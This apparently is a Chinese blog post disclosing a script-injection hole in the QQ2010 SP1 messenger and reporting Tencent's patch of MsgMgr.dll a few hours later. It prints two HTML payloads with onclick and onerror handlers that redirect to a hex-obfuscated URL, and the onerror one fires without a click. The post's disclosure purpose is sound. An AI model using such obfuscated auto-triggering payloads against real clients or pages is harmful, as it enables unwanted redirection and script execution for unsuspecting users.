感谢博越信息科技的投递
腾讯QQ一向是腾讯主打的产品，意想不到前天发布的QQ2010SP1竟然有如此大漏洞。
首先囧一下:脚本出错还会提示错误

1、消息记录的Javascript、Html标签没有屏蔽

2、消息盒子Javascript、Html标签没有屏蔽

3、小实验

1、发送代码：<input onclick=”window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’” />

因为腾讯会自动将url转换，我们必须混淆url才能发送

4、超牛代码

<img src=’tetet’ onerror=”window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’”/>

因为要点击才能触发，想到一个不用点击就能触发的代码。

5、希望腾讯快点修复，这个漏洞非同小可

6、本漏洞由TGL发现。

注意，本代码仅供研究之用，请勿用于不当用途。
如打算规避漏洞带来的风险，请下载SP0版本，看来SP1版本的changelog得修改为“更新了一些漏洞”。

腾讯QQ2010 SP1漏洞悄然修复

腾讯的危机应急能力很高。在14:56:32秒已经打包新版本并在首页提供下载。一个小风波就在几个小时静悄悄的来，静悄悄的走了。
希望腾讯以后也不要犯低级错误咯，如果还发现有Bug，可以重新下载QQ2010 SP1。

从图中可以看到MsgMgr.dll是元凶，已经在14:02:54秒重新签名，漏洞提交给腾讯为早上9点。